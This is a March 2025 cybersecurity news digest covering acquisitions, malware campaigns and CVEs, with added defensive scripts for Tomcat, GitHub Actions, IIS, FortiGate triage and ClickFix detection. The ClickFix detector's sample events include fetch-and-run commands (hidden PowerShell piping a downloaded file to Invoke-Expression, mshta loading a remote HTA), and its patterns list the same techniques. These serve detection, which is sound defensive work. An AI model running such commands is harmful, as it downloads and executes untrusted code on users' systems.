Tuesday, Mar 18, 2025 // (IG): BB // GITHUB // SN R&D
Alphabet Resumes Talks to Acquire Cybersecurity Firm Wiz in $30 Billion Deal
Bottom Line Up Front (BLUF): Alphabet is in advanced discussions to acquire Wiz, a cloud security startup, for approximately $30 billion. This follows a previous attempt last summer when negotiations stalled due to regulatory concerns. If completed, the acquisition would be one of the largest tech deals of 2025 and would expand Google's cybersecurity portfolio.
Analyst Comments: This potential acquisition highlights Alphabet's ongoing strategy to strengthen its cybersecurity offerings, particularly in cloud security. Wiz, which partners with major cloud providers such as Amazon, Microsoft, and Google, would provide Alphabet with advanced security tools and reinforce its competitive position against AWS and Microsoft Azure. However, regulatory scrutiny remains a significant hurdle, as antitrust concerns surrounding Big Tech acquisitions are at an all-time high. If the deal proceeds, it could trigger further consolidation within the cybersecurity industry as rivals seek to bolster their security capabilities.
FROM THE MEDIA: Alphabet is reportedly close to finalizing a $30 billion acquisition of Wiz, a cloud security startup based in New York and Israel. The deal, which previously collapsed last summer over regulatory concerns, has been revived as both parties reassess the potential benefits. Wiz, known for its cutting-edge cybersecurity solutions, already collaborates with Google Cloud, AWS, and Microsoft Azure, making it a valuable asset for Alphabet's cloud security expansion. If successful, this acquisition would be one of the most significant tech deals of the year, further cementing Google's ambitions in the cybersecurity market. However, regulatory scrutiny is expected, given the increasing focus on Big Tech's market influence.
READ THE STORY: WSJ
Telegram CEO Leaves France Amid Criminal Investigation
Bottom Line Up Front (BLUF): Telegram founder Pavel Durov has left France and returned to Dubai after a judge temporarily suspended a judicial order requiring him to stay in the country. Durov was arrested in August 2024 at Le Bourget Airport and charged with violations related to cyber and financial crimes linked to activity on Telegram. The investigation remains ongoing, with Durov asserting that Telegram meets and exceeds legal obligations in moderation and compliance.
Analyst Comments: Authorities in Europe and the U.S. have raised concerns that Telegram is being used to distribute hacking tools and extremist content and to host cybercrime marketplaces. While Durov maintains Telegram's commitment to free speech and privacy, governments may push for stricter regulation and enforcement to curb illicit activity. The outcome of this investigation could shape how messaging platforms that market themselves on privacy handle content moderation and lawful-access demands in Europe and beyond.
FROM THE MEDIA: Durov, who became a UAE citizen in 2021, confirmed his departure from France, thanking the investigative judges for permitting his travel. Telegram boasts 950 million monthly users and has been under government scrutiny due to its role in cybercrime and extremist content distribution. Reports suggest that criminal groups and state-sponsored actors have used Telegram for data exfiltration, hacking tools, and misinformation campaigns. The French investigation remains ongoing, and Durov’s legal situation could impact Telegram’s regulatory future in Europe and beyond.
READ THE STORY: The Record
Baidu Unveils Ernie X1 AI Model to Challenge DeepSeek
Bottom Line Up Front (BLUF): Chinese tech giant Baidu has launched Ernie X1, a new reasoning-focused AI model that aims to rival DeepSeek-R1 at half the cost. Alongside this, Baidu also released Ernie 4.5, which it claims outperforms OpenAI’s GPT-4.5 at a fraction of the price. Both models will be integrated into Baidu’s consumer ecosystem, including Baidu Search and its AI chatbot, Ernie Bot.
Analyst Comments: Baidu’s aggressive push into AI highlights the escalating competition in China’s AI race, particularly against rising startups like DeepSeek. While DeepSeek-R1 disrupted the market with high efficiency and affordability, Baidu is leveraging its cloud infrastructure and existing market dominance to retain competitiveness. The pricing strategy—offering AI at significantly lower costs than Western counterparts—suggests China’s focus on domestic AI independence. However, performance claims remain unverified, and real-world adoption will determine whether Baidu’s models can effectively challenge OpenAI and DeepSeek.
FROM THE MEDIA: Baidu’s Ernie 4.5 is positioned as a cheaper and superior alternative to OpenAI’s GPT-4.5. Analysts speculate that DeepSeek’s rapid rise pressured Baidu to accelerate its release timeline. With its AI cloud platform (Qianfan) and integration into Baidu’s services, the company aims to maintain dominance despite growing competition.
READ THE STORY: WSJ
North Korean Hackers Deploy ‘DocSwap’ Malware Disguised as Security Tool
Bottom Line Up Front (BLUF): A newly discovered malware, DocSwap, linked to a North Korean Advanced Persistent Threat (APT) group, targets mobile users—especially in South Korea. DocSwap masquerades as a legitimate document authentication app while executing malicious activities such as keylogging, data theft, and phishing. The malware dynamically decrypts and loads additional payloads, making it harder to detect and analyze.
Analyst Comments: Abusing Android accessibility-service permissions for keylogging, combined with foreground-service persistence and staged payload loading, points to a deliberately engineered mobile campaign rather than opportunistic malware. The attribution to the puNK-004 cluster reinforces concerns about North Korea's sustained targeting of South Korean users and financial platforms. Organizations should vet mobile applications before allowing them on managed devices, block sideloading and installation from unknown sources, restrict which apps may hold accessibility permissions, and educate users on phishing risks.
FROM THE MEDIA: Researchers at S2W's Threat Research and Intelligence Center (TALON) first detected DocSwap on December 13, 2024, and analyzed its behavior and infrastructure. The command-and-control server initially hosted a CoinSwap phishing page and later a page imitating South Korea's Naver portal, hinting at a connection with the Kimsuky APT group. On launch, DocSwap requests far more permissions than a document-authentication app needs, which lets it log keystrokes and exfiltrate sensitive user data. It keeps itself running through Android foreground-service APIs and encrypts its communication with its command-and-control (C2) servers. Researchers warn that North Korean threat actors are steadily refining their mobile malware, making such attacks harder to detect and mitigate.
READ THE STORY: GBhackers
Silicon Valley Backs Israeli Defense Startups for U.S. Military Market
Bottom Line Up Front (BLUF): U.S. venture capital firms, including Sequoia Capital and Lux Capital, are increasingly investing in Israeli defense startups to secure future U.S. and European military contracts. One notable startup, Kela, has received $39 million in funding, including backing from the CIA's investment arm, IQT. These investments align with rising global defense budgets and the Pentagon's shift toward new military technologies.
Analyst Comments: The involvement of Silicon Valley VCs and the CIA signals a growing belief that Israeli startups can compete with major U.S. defense contractors. However, Pentagon procurement policies may present obstacles for non-U.S. firms. Kela’s approach—blending battlefield experience with cutting-edge tech—mirrors Palantir’s successful entry into the defense sector. If this trend continues, it could reshape the defense startup landscape, fostering greater competition in military AI, surveillance, and combat tech.
FROM THE MEDIA: Kela, an Israeli startup integrating commercial and military technologies, has secured funding from top U.S. venture firms and the CIA’s venture arm, IQT. Israel’s growing defense-tech ecosystem now includes over 300 startups, doubling in a year. Investors believe these companies can compete for Pentagon contracts despite challenges faced by non-U.S. firms. Kela’s leadership, many with combat experience, positions it as a potential major player in defense AI and battlefield integration.
READ THE STORY: WSJ
Apache Tomcat Vulnerability Exploited 30 Hours After Public Disclosure
Bottom Line Up Front (BLUF): A newly disclosed vulnerability in Apache Tomcat (CVE-2025-24813) is being actively exploited just 30 hours after a proof-of-concept (PoC) was released. The flaw allows remote code execution and information disclosure in specific configurations. Affected users are urged to update to patched versions 9.0.99, 10.1.35, and 11.0.3.
Analyst Comments: The exploit is trivial and requires no authentication, but it is not a default-configuration bug: the file write needs the default servlet's readonly parameter set to false (the shipped default is true), and the path to code execution additionally needs file-based session persistence (PersistentManager with a FileStore) and a usable deserialization gadget on the classpath. Where those conditions hold, a partial PUT lets an attacker drop a serialized Java object into Tomcat's work directory and then have it loaded as a session, escalating from a file write to full server compromise. Organizations running affected versions should patch immediately, confirm that readonly is not overridden to false, and review whether file-based session persistence is actually needed.
FROM THE MEDIA: The Apache Tomcat vulnerability (CVE-2025-24813) is now being exploited in the wild; a PoC appeared and attacks followed roughly 30 hours after public disclosure. The flaw affects Tomcat 9.0.0.M1 through 9.0.98, 10.1.0-M1 through 10.1.34 and 11.0.0-M1 through 11.0.2 and lets attackers upload files via partial PUT requests and, in vulnerable configurations, execute them. Security firm Wallarm confirmed active attacks abusing Tomcat's session persistence mechanism: a crafted serialized Java payload is uploaded and later executed when Tomcat deserializes it as a session. The ease of exploitation and the absence of any authentication requirement make this a critical issue, and users should apply the patches and review server configurations now.
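The following triage helper is an added example written for this page; it is not code from the article, from Wallarm or from the Apache project. It checks the two non-default Tomcat settings that exploitation depends on (a writable DefaultServlet and file-based session persistence) and flags the request pattern in an access log. The web.xml and context.xml excerpts, the log lines and the host addresses are all constructed for illustration, and a ".session" PUT is treated as the exploitation pattern because the persisted-session lookup expects a file with that suffix.

```python
"""Triage helpers for Apache Tomcat CVE-2025-24813 (added example, constructed input)."""
import re
import xml.etree.ElementTree as ET

# Constructed conf/web.xml excerpt: DefaultServlet with readonly=false.
# The shipped default is true, which makes Tomcat answer PUT/DELETE with 403.
WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

# Constructed context.xml excerpt enabling file-based session persistence.
CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>"""

# Constructed access log in common log format; addresses are documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2025:10:01:02 +0000] "PUT /demo.session HTTP/1.1" 409 -
10.0.0.5 - - [17/Mar/2025:10:01:03 +0000] "GET /index.jsp HTTP/1.1" 200 1234
192.0.2.7 - - [17/Mar/2025:10:02:00 +0000] "PUT /upload/report.txt HTTP/1.1" 403 -
198.51.100.9 - - [17/Mar/2025:10:03:00 +0000] "GET /static/app.js HTTP/1.1" 200 88"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def _local(tag):
    """Strip an XML namespace: '{ns}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def default_servlet_writable(web_xml):
    """True when the DefaultServlet has readonly explicitly set to false."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if not (_child_text(servlet, "servlet-class") or "").endswith(".DefaultServlet"):
            continue
        for param in servlet:
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "readonly":
                return (_child_text(param, "param-value") or "").lower() == "false"
    return False  # readonly stays at its default of true


def file_session_persistence(context_xml):
    """True when sessions are written to disk (PersistentManager + FileStore)."""
    root = ET.fromstring(context_xml)
    for manager in root.iter("Manager"):
        if "PersistentManager" in manager.get("className", ""):
            for store in manager.iter("Store"):
                if "FileStore" in store.get("className", ""):
                    return True
    return False


def suspicious_put_requests(log_text):
    """Return PUT requests worth a second look, exploitation pattern first."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        if method != "PUT":
            continue
        if status == "403":
            reason = "PUT refused (readonly is probably true)"
        elif path.endswith(".session"):
            reason = "PUT of a .session file: CVE-2025-24813 exploitation pattern"
        else:
            reason = "PUT not refused (default servlet may be writable)"
        hits.append({"client": client, "path": path, "status": status, "reason": reason})
    hits.sort(key=lambda h: ".session" not in h["reason"])
    return hits


def exposure_summary(web_xml, context_xml):
    """One-line verdict combining the two configuration checks."""
    writable = default_servlet_writable(web_xml)
    persisted = file_session_persistence(context_xml)
    if writable and persisted:
        return "RCE-exposed (writable default servlet + file session persistence)"
    if writable:
        return "file write/disclosure exposed (writable default servlet)"
    return "not exposed by these settings"
```

Note that a 409 on the PUT does not mean the write failed; the partial PUT can leave the temporary file behind regardless, which is why the path suffix, not the status, drives the alert. The configuration checks say whether the preconditions exist, not whether a gadget chain is present, so treat "RCE-exposed" as a reason to patch and restore readonly, not as proof of compromise. Default access-log patterns do not record the Content-Range header; add it to the AccessLogValve pattern if you want to distinguish partial from full PUTs.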
READ THE STORY: THN
Hackers Rapidly Adopt ClickFix Technique for Sophisticated Attacks
Bottom Line Up Front (BLUF): Cybercriminals and nation-state actors are increasingly using the ClickFix technique, a social engineering method that tricks users into running malicious PowerShell commands. This technique, which exploits fake security prompts, enables the deployment of infostealers that harvest sensitive data like credentials and cryptocurrency wallets. Security firms are actively tracking and mitigating this growing threat.
Analyst Comments: ClickFix represents a dangerous shift in cyberattack strategies, leveraging user psychology rather than technical vulnerabilities. The technique works because the user, not an exploit, runs the command, and the payload is fetched by a signed system binary such as PowerShell or mshta rather than arriving as a file attachment, which sidesteps mail filters and many download-based controls; that makes user education and endpoint telemetry critical. The rapid adoption by nation-state actors suggests that this method could be used at scale for espionage and financial theft. Organizations must harden defenses against this emerging threat with threat intelligence, behavior-based detection on process creation, and user awareness programs.
FROM THE MEDIA: The ClickFix infection chain typically starts with phishing, malvertising, or compromised websites. A fake error or verification prompt tells the user to "fix" the problem by opening the Windows Run dialog (Win+R) or a terminal and pasting a command that the page has already placed on the clipboard via JavaScript; running it executes malware such as the Lumma infostealer. Lumma, sold as Malware-as-a-Service, targets browser data and cryptocurrency wallets. Security researchers have identified numerous domains hosting ClickFix content, and cybersecurity firms are developing detection signatures to combat its spread.
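The detection logic below is an added example, not code from the article or from any vendor. It scores process-creation events for the ClickFix pattern: a living-off-the-land binary started from explorer.exe (where Run-dialog launches land) with a command line that hides its window, bypasses execution policy, downloads something and pipes it to Invoke-Expression, or hands mshta a remote HTA. The field names follow the Sysmon Event ID 1 layout; the events, the weights and the threshold are constructed assumptions to tune against your own baseline.

```python
"""ClickFix scoring over Sysmon-style process-creation events (added example)."""
import re

# Constructed events. The first two model a user pasting a clipboard-hijacked
# command into Win+R; the third is a routine admin task from a terminal.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://198.51.100.7/fix.txt | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
     "CommandLine": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
]

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "certutil.exe"}

# (pattern, weight, label); weights are illustrative, not a vendor scale.
INDICATORS = [
    (re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?"), 3, "hidden window"),
    (re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 3, "encoded command"),
    (re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"), 2, "execution policy bypass"),
    (re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"), 2, "web download"),
    (re.compile(r"(?i)\|\s*iex\b|invoke-expression"), 3, "pipe to Invoke-Expression"),
    (re.compile(r"(?i)\bmshta(\.exe)?\s+https?://"), 4, "mshta fetching remote HTA"),
    (re.compile(r"(?i)https?://\d{1,3}(\.\d{1,3}){3}"), 1, "raw IP URL"),
]


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, matched indicator labels) for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    # Win+R launches are children of explorer.exe; terminals and IDEs are not.
    if parent == "explorer.exe":
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog)")
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def clickfix_alerts(events, threshold=6):
    """Events at or above the threshold, with the indicators that fired."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"image": basename(event["Image"]), "score": score, "reasons": reasons})
    return alerts
```

The explorer.exe parent is the distinguishing feature: legitimate administrative PowerShell rarely has it, while every Run-dialog paste does. On hosts where Sysmon is not deployed, Windows Security event 4688 with command-line auditing enabled carries the same three fields under different names.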
READ THE STORY: GBhackers
Microsoft Warns of ‘StilachiRAT’ Targeting Credentials and Crypto Wallets
Bottom Line Up Front (BLUF): Microsoft has identified StilachiRAT, a new remote access trojan (RAT) that steals browser credentials, cryptocurrency wallets, and system information. The malware employs anti-forensic techniques, clears event logs, and leverages Windows system APIs to evade detection. StilachiRAT’s command-and-control (C2) server enables real-time execution of malicious commands, making it a significant threat to enterprises and individual users.
Analyst Comments: StilachiRAT showcases advanced evasion techniques, including sandbox detection and log clearing, making it particularly difficult to detect. The targeting of popular cryptocurrency wallets suggests financial motives, while its extensive system reconnaissance capabilities indicate potential use in espionage campaigns. Organizations should implement endpoint detection and response (EDR) solutions, restrict browser-based credential storage, and monitor clipboard activities for unauthorized access to sensitive data.
FROM THE MEDIA: Microsoft researchers first detected StilachiRAT in November 2024, embedded in a DLL module named "WWStartupCtrl64.dll." While the exact delivery method remains unknown, Microsoft warns that phishing emails, malicious downloads, or software vulnerabilities may be used for initial infection. The malware harvests OS details, hardware identifiers, and active RDP sessions using Windows Management Instrumentation (WMI) queries to gather intelligence. StilachiRAT can also execute ten different remote commands, including stealing Chrome passwords, launching applications, and modifying network connections. Microsoft has urged users to update security defenses and monitor for unusual system activity.
READ THE STORY: THN
SocGholish Exploits Compromised Websites to Deliver RansomHub Ransomware
Bottom Line Up Front (BLUF): A new campaign leveraging the SocGholish malware framework has been identified as a major distributor of RansomHub ransomware. Attackers inject obfuscated JavaScript into compromised websites, redirecting users to fake browser update pages that deploy malware. SocGholish enables persistent access, data exfiltration, and ransomware delivery, with government organizations in the United States among the most targeted.
Analyst Comments: SocGholish's obfuscation techniques and its use of the Keitaro Traffic Distribution System (TDS) let attackers evade detection by filtering out security researchers and sandbox environments before the payload is ever served. To mitigate the risk, organizations should focus on hardened endpoint security, extended detection and response (XDR) solutions, and web application firewalls (WAFs). Because the campaign depends on compromising legitimate websites, companies must also secure their CMS platforms and plugins.
FROM THE MEDIA: Attackers inject malicious JavaScript into compromised websites, redirecting visitors to pages posing as legitimate browser updates. Unsuspecting users download a malicious ZIP file, executing a loader that deploys further malware and, ultimately, the ransomware payload. The Keitaro TDS filters visitors by fingerprint so that researchers and sandboxes are routed away from the payload, letting the infrastructure stay undetected for extended periods. Cybersecurity experts recommend securing CMS platforms, enabling multi-factor authentication (MFA), and deploying web reputation services to mitigate the threat.
READ THE STORY: GBhackers
GitHub Restores Code After Malicious Changes to Popular CI/CD Tool
Bottom Line Up Front (BLUF): GitHub took emergency action to restore compromised code in the tj-actions/changed-files repository, a widely used GitHub Action affecting over 23,000 organizations. Attackers modified the tool to leak CI/CD secrets, including AWS access keys and private RSA keys. The flaw, CVE-2025-30066, allowed secrets to be exposed in build logs, making public repositories particularly vulnerable.
Analyst Comments: This incident highlights the systemic risks of third-party dependencies in CI/CD environments. Attackers target automation pipelines to introduce malicious code, leveraging the trust developers place in open-source repositories. Organizations should audit their workflows for any reference to the affected action, rotate every secret that a pipeline using it could have printed, and pin third-party actions to full commit SHAs rather than mutable tags, since in this case the attacker moved the existing version tags onto the malicious commit so that workflows referencing "@v45" or similar silently picked it up. The event also underscores the need for real-time monitoring of build logs to detect potential credential leaks.
FROM THE MEDIA: Security firm StepSecurity identified unauthorized modifications in the tj-actions/changed-files GitHub Action. The vulnerability led to secrets exposure in build logs, particularly in public repositories. GitHub swiftly intervened, suspending affected accounts and removing the malicious code. Security researchers at Wiz Threat Research found dozens of affected repositories, including those operated by large enterprises. Investigations point to a compromised personal access token (PAT) belonging to the repository's automation bot account, which was used to push the malicious commit and retarget existing version tags to it. Experts recommend requiring signed commits, rotating all potentially exposed secrets, and closely monitoring open-source dependencies.
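As an added example (not code from the article, StepSecurity, Wiz or GitHub), the audit below walks a workflow file and reports every third-party action that is referenced by a mutable tag or branch instead of a full 40-character commit SHA, and separately flags any reference to the compromised action regardless of version, because the tags themselves were retargeted. It matches uses: lines with a regex so it needs no YAML library; the workflow text and the placeholder SHA are constructed.

```python
"""Audit GitHub workflow 'uses:' references for mutable pins (added example)."""
import re

# Constructed workflow. The 40-hex value is a placeholder, not a real commit.
WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: tj-actions/changed-files@v45
        id: changed
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - uses: docker://alpine:3.19
      - run: npm test
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"#\s]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Actions known to have been compromised upstream. No version list: nearly
# every tag of the affected action was moved to the malicious commit.
COMPROMISED = {"tj-actions/changed-files"}


def parse_uses(workflow_text):
    """Yield (line_no, owner/repo, ref) for each external action reference."""
    for n, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local composite actions and images need a different check
        repo, _, version = ref.partition("@")
        repo = "/".join(repo.split("/")[:2])  # drop any subdirectory path
        yield n, repo, version


def audit_workflow(workflow_text):
    """Return (line_no, severity, message) findings, most severe first."""
    findings = []
    for n, repo, version in parse_uses(workflow_text):
        if repo in COMPROMISED:
            findings.append((n, "critical",
                             f"{repo} referenced (compromised upstream): remove or pin to a reviewed SHA and rotate secrets"))
        if not version:
            findings.append((n, "high", f"{repo} has no ref; it resolves to the default branch"))
        elif not SHA_RE.match(version):
            findings.append((n, "medium", f"{repo}@{version} is a mutable tag or branch; pin to a full commit SHA"))
    order = {"critical": 0, "high": 1, "medium": 2}
    findings.sort(key=lambda f: (order[f[1]], f[0]))
    return findings
```

Run it over every file under .github/workflows in each repository, including reusable workflows that are themselves referenced with uses:. Pinning to a SHA removes the tag-retargeting vector, but a SHA still points at whatever that commit contained, so pair it with a review of the pinned code and with a tool that proposes SHA updates rather than hand-editing them.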
READ THE STORY: The Record
New C++-Based IIS Malware Evades Detection by Mimicking cmd.exe
Bottom Line Up Front (BLUF): A newly discovered malware targeting Microsoft IIS servers uses a rare C++/CLI implementation to evade detection. The malware mimics the behavior of cmd.exe, registers for HTTP response events, and uses AES-encrypted commands to execute malicious actions stealthily. Security teams should immediately monitor IIS logs and deploy advanced threat detection solutions.
Analyst Comments: The choice of C++/CLI is unusual in malware development, likely intended to make static analysis more difficult and blend malicious activity into legitimate IIS operations. By registering for HTTP events and processing hidden commands, this malware can maintain persistence with minimal visibility. The use of a custom command wrapper further reduces forensic traces by avoiding direct execution via the IIS process. Organizations running IIS should enhance monitoring for unusual HTTP requests, check for unauthorized command execution, and deploy endpoint security solutions capable of detecting behavioral anomalies.
FROM THE MEDIA: Palo Alto Networks' Unit 42 has identified a sophisticated IIS malware that integrates as a passive backdoor by intercepting HTTP requests. Uploaded from Thailand, the malware exists in two versions, the latest compiled in May 2023. It filters incoming requests for specific headers and decrypts the embedded commands with AES before execution. Command input and output are relayed over named pipes, with the malware acting as a wrapper around the command interpreter so that the IIS worker process never invokes cmd.exe directly. It also patches AMSI and ETW routines to evade detection. Security researchers warn that this malware may already be active in targeted campaigns, emphasizing the need for proactive defense measures.
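A backdoor that registers for HTTP events has to be loaded by IIS as a module, which means it must appear in the server configuration: native modules under globalModules with an image path, managed modules under modules with a .NET type. The hunting script below is an added example (not code from the article or Unit 42) that flags native images loaded from outside the inetsrv directory and managed types outside the Microsoft namespaces. Both rules are heuristics that will also surface legitimate third-party modules, and the applicationHost.config excerpt is constructed.

```python
"""Flag unexpected IIS modules in applicationHost.config (added example)."""
import xml.etree.ElementTree as ET

# Constructed excerpt. IISCompat and ReqMon are made-up names standing in for a
# native and a managed backdoor respectively.
APPHOST = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="StaticFileModule" image="%windir%\\System32\\inetsrv\\static.dll" />
      <add name="HttpLoggingModule" image="%windir%\\System32\\inetsrv\\loghttp.dll" />
      <add name="IISCompat" image="C:\\inetpub\\temp\\iiscompat.dll" />
    </globalModules>
    <modules>
      <add name="Session" type="System.Web.SessionState.SessionStateModule" preCondition="managedHandler" />
      <add name="RequestFilter" type="ReqMon.Handler, ReqMon" preCondition="managedHandler" />
    </modules>
  </system.webServer>
</configuration>"""

TRUSTED_NATIVE_DIR = "%windir%\\system32\\inetsrv\\"
TRUSTED_MANAGED_PREFIXES = ("system.web.", "system.webserver.", "microsoft.")


def _norm(path):
    """Lower-case and use backslashes so prefix checks are stable."""
    return path.replace("/", "\\").lower()


def audit_iis_modules(config_text):
    """Return (kind, module name, image or type) for modules outside the allowlists."""
    root = ET.fromstring(config_text)
    findings = []
    # Native modules: a DLL that IIS loads into every worker process.
    for global_modules in root.iter("globalModules"):
        for add in global_modules.findall("add"):
            image = _norm(add.get("image", ""))
            if not image.startswith(TRUSTED_NATIVE_DIR):
                findings.append(("native", add.get("name"), image))
    # Managed modules: a .NET type (C++/CLI assemblies land here too).
    for modules in root.iter("modules"):
        for add in modules.findall("add"):
            mtype = add.get("type", "")
            if mtype and not mtype.lower().startswith(TRUSTED_MANAGED_PREFIXES):
                findings.append(("managed", add.get("name"), mtype))
    return findings
```

Modules can also be registered per site or per application in a web.config, or inside a location element of applicationHost.config, so feed those files through the same function. For a live view rather than a file parse, appcmd list modules and the WebAdministration cmdlet Get-WebGlobalModule enumerate what IIS has actually loaded; compare that list against the on-disk configuration and hash any image you do not recognize.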
READ THE STORY: GBhackers
Alphabet Spins Off Laser-Based Internet Project Taara to Compete with Starlink
Bottom Line Up Front (BLUF): Alphabet has officially spun off its laser-based internet project, Taara, from its "moonshot" incubator. The startup aims to provide high-speed internet to remote areas by using light beams instead of satellites, positioning itself as a competitor to Elon Musk's Starlink. Taara operates in 12 countries and has secured funding from Series X Capital, while Alphabet retains a minority stake.
Analyst Comments: Taara’s approach to internet connectivity leverages optical laser technology to bypass traditional infrastructure limitations. This provides a low-cost alternative to fiber optics while avoiding the bandwidth constraints of satellite-based networks like Starlink. However, concerns remain about performance in adverse weather conditions, such as fog or heavy rain, which could disrupt the laser connections. The project’s success will largely depend on its ability to scale, integrate with telecom providers, and overcome regulatory and environmental challenges.
FROM THE MEDIA: Alphabet’s Taara, developed within its X research division, uses laser beams to transmit internet signals, offering speeds up to 20 Gbps over distances of 20 km. The technology was originally part of the now-defunct Loon project, which aimed to provide internet via high-altitude balloons. Unlike Starlink’s satellite-based model, Taara partners with telecom operators like Bharti Airtel and T-Mobile to extend fiber-optic networks to underserved areas. The startup has already demonstrated its capabilities with a 5km laser link across the Congo River, significantly reducing internet costs. With backing from Series X Capital, Taara is hiring aggressively and working on next-generation photonic chips to enhance scalability and efficiency.
READ THE STORY: FT
European Missile Manufacturer MBDA Races to Ramp Up Production Amid Security Concerns
Bottom Line Up Front (BLUF): MBDA, one of Europe's leading missile manufacturers, is rapidly increasing production capacity in response to heightened defense needs. With a $40 billion order backlog and plans to invest $2.7 billion in expansion, MBDA aims to reduce reliance on U.S. weaponry. However, supply chain constraints, workforce shortages, and competition from American defense firms remain critical obstacles.
Analyst Comments: The surge in European defense spending, driven by Russia’s invasion of Ukraine and concerns over U.S. reliability as a security partner, has created an urgent need for independent arms production. MBDA's expansion is a necessary step toward European defense sovereignty, but it highlights long-standing production limitations. The company’s slow adaptation to changing security needs and gaps in hypersonic missile capabilities and long-range air defense could limit its competitive edge. Additionally, while the U.S. has maintained consistent production levels, European firms like MBDA are struggling to scale up quickly.
FROM THE MEDIA: MBDA is doubling missile production across key weapons systems, increasing Akeron anti-tank guided missile output to 40 per month and boosting Aster air-defense missile production by 50% by 2026. The company is addressing supply chain constraints by stockpiling strategic materials such as steel and titanium while adding new manufacturing equipment and expanding its workforce. However, MBDA still lags behind U.S. defense firms such as Lockheed Martin, which produces 720 cruise missiles annually compared to MBDA's lower output. Furthermore, MBDA's SAMP/T air defense system has struggled to compete with the U.S. Patriot system, raising concerns about Europe's ability to fully replace American military support.
READ THE STORY: WSJ
New Ransomware Gang ‘Mora_001’ Exploiting Fortinet Vulnerabilities
Bottom Line Up Front (BLUF): A newly discovered ransomware group, Mora_001, is actively exploiting two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472) to deploy a ransomware strain called SuperBlack. The vulnerabilities affect FortiGate firewall appliances, and despite urgent patching advisories from CISA and Fortinet, attackers continue targeting unpatched systems. Mora_001 is believed to have ties to the LockBit ransomware group, leveraging LockBit’s leaked builder to create their variant.
Analyst Comments: The rapid exploitation of the Fortinet flaws highlights the urgency for organizations to patch critical infrastructure as soon as fixes become available. Mora_001’s use of LockBit 3.0’s leaked builder also suggests a growing trend of cybercriminals repurposing existing ransomware tools rather than developing new ones from scratch. To mitigate the risk, security teams should prioritize patching, network segmentation, and monitoring for unauthorized access attempts.
FROM THE MEDIA: The Mora_001 ransomware group has been exploiting the Fortinet vulnerabilities since at least February 2, 2025, according to Forescout Research and Arctic Wolf. Their attacks typically begin with unauthorized administrative access obtained through the vulnerabilities, followed by deployment of SuperBlack ransomware, a LockBit 3.0 derivative with a modified ransom note. CISA added CVE-2024-55591 to its Known Exploited Vulnerabilities catalog in January, highlighting the flaw's severity and requiring federal agencies to patch it. Attackers now target organizations that have not fully patched their systems or hardened their firewall configurations. Fortinet has issued patches for both vulnerabilities, but threat actors are accelerating attacks on unpatched devices.
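The public advisories for CVE-2024-55591 list successful administrator logins through the jsconsole interface from unexpected or spoofed source addresses, followed by the creation of new local administrator accounts, as the signs of exploitation on a FortiGate. The triage script below is an added example (not code from the article, Forescout, Arctic Wolf or Fortinet) that applies those two indicators to FortiGate event logs in their key=value format. The log lines, the device name, the trusted management network and the exact field names are assumptions to check against your own exports before relying on them.

```python
"""Triage FortiGate system event logs for post-exploitation indicators (added example)."""
import ipaddress
import re

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Assumed management network; anything else logging in via jsconsole is suspect.
TRUSTED_MGMT = [ipaddress.ip_network("10.0.0.0/24")]

# Constructed log lines modelled on the FortiGate event/system layout.
SAMPLE_LOGS = """\
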